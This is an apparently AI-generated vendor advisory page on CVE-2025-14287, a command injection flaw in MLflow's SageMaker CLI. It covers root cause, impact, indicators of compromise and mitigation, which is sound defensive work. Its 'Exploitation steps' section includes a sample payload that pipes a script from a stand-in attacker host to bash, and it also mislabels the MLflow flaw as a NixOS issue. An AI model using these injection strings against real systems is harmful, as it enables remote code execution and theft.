CVE-2025-14287: 
NixOS vulnerability analysis and mitigation

Overview

CVE-2025-14287 is a command injection vulnerability in MLflow (mlflow/mlflow) versions before v3.7.0, specifically in the mlflow/sagemaker/__init__.py file (lines 161–167). User-supplied container image names are directly interpolated into shell commands without sanitization and executed via os.system(), enabling arbitrary OS command execution through the --container CLI parameter. The vulnerability was disclosed on March 15–16, 2026, and affects development environments, CI/CD pipelines, and cloud deployments using MLflow. It carries a CVSS v3.1 base score of 8.8 (High) (Red Hat Advisory, Red Hat Bugzilla).

Technical details

The root cause is improper neutralization of special elements in an OS command (CWE-78) and improper control of code generation (CWE-94). In mlflow/sagemaker/__init__.py at lines 161–167, the application constructs shell command strings by directly embedding the user-controlled --container parameter value without any input validation or escaping, then passes the resulting string to os.system(). An attacker can inject shell metacharacters (e.g., ;, &&, |, backticks) into the container image name to append or substitute arbitrary commands. Exploitation requires user interaction — specifically, a user must execute the MLflow CLI with the attacker-controlled --container argument, which could occur in automated CI/CD pipelines processing untrusted input (Red Hat Bugzilla, Huntr Bounty).

Impact

Successful exploitation allows an attacker to execute arbitrary operating system commands with the privileges of the MLflow process, resulting in high confidentiality, integrity, and availability impact. This can lead to full system compromise, data exfiltration, credential theft, or disruption of ML workflows in affected environments. The vulnerability is particularly dangerous in CI/CD pipelines and cloud deployments (e.g., AWS SageMaker integrations) where MLflow processes may run with elevated permissions or have access to sensitive infrastructure (Red Hat Advisory, Red Hat Bugzilla).

Exploitability

No confirmed in-the-wild exploitation has been observed, and no weaponized exploit code is publicly available as of the time of reporting. A bounty report exists on Huntr (the vulnerability disclosure platform), but the associated page content was found to be non-exploitable upon analysis (Huntr Bounty). The EPSS score is approximately 0.071% (very low probability of exploitation in the near term). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.

Exploitation steps

  1. Identify target: Locate an environment running MLflow versions before v3.7.0 that uses the SageMaker deployment CLI, such as a CI/CD pipeline, developer workstation, or cloud deployment script.
  2. Craft malicious container image name: Prepare a container image name string containing shell injection characters, for example: legitimate-image:latest; curl http://attacker.com/shell.sh | bash or legitimate-image:latest && id > /tmp/pwned.
  3. Deliver malicious input: Supply the crafted string as the --container parameter to the MLflow CLI command, e.g., mlflow sagemaker deploy --container 'legitimate-image:latest; <malicious_command>'. In a CI/CD context, this could be achieved by manipulating pipeline configuration files, environment variables, or upstream inputs that feed into the MLflow CLI invocation.
  4. Trigger execution: When the MLflow SageMaker module processes the command, it interpolates the unsanitized container name into a shell command string and passes it to os.system(), executing the injected payload with the privileges of the MLflow process.
  5. Achieve objective: The injected command executes, enabling reverse shell establishment, credential harvesting, lateral movement, or data exfiltration depending on the attacker's goal (Red Hat Bugzilla, Huntr Bounty).

Indicators of compromise

  • Process: Unexpected child processes spawned by the MLflow Python process (e.g., /bin/sh, bash, curl, wget, python) with unusual arguments or network connections.
  • Logs: MLflow CLI invocations with --container parameter values containing shell metacharacters (;, &&, ||, |, backticks, $()) in application or shell history logs.
  • Network: Unexpected outbound connections from the MLflow host to external IPs or domains, particularly shortly after MLflow SageMaker CLI commands are executed.
  • File System: Unexpected files created in world-writable directories (e.g., /tmp/) by the MLflow process; new scripts, binaries, or cron jobs created under the MLflow service account.
  • Environment: Unusual environment variable modifications or new SSH authorized keys added to the MLflow process owner's account.

Mitigation and workarounds

The primary remediation is to upgrade MLflow to version v3.7.0 or later, which addresses the unsanitized interpolation of container image names in the SageMaker module (Red Hat Advisory, Red Hat Bugzilla). As interim workarounds: restrict CLI access to trusted users only; implement strict input validation on container image names (allowlist of valid image name characters); avoid passing untrusted or user-controlled values to the --container parameter; and consider running MLflow processes in sandboxed or containerized environments with minimal privileges to limit the blast radius of any command execution.

Community reactions

The vulnerability was reported through the Huntr bug bounty platform and assigned by @huntr_ai. Red Hat tracked it via their security response process (Bugzilla Bug 2447690) with a high severity rating. A brief technical write-up was published at infinitsec.net shortly after disclosure. Social media activity was limited, with automated CVE tracking posts appearing on Bluesky. No major vendor statements or significant researcher commentary beyond the initial disclosure have been identified.

Additional resources

Linux Distribution fix status

Fix availability across major Linux distributions and their releases.

RHEL / CentOS

Unknown

Source: This report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-103678HIGH8.1
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103680MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103679MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103497MEDIUM5.5
  • YouTrack logoYouTrack
  • cpe:2.3:a:jetbrains:youtrack
NoYesOct 01, 2026
CVE-2026-103496MEDIUM5.4
  • YouTrack logoYouTrack
  • youtrack
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management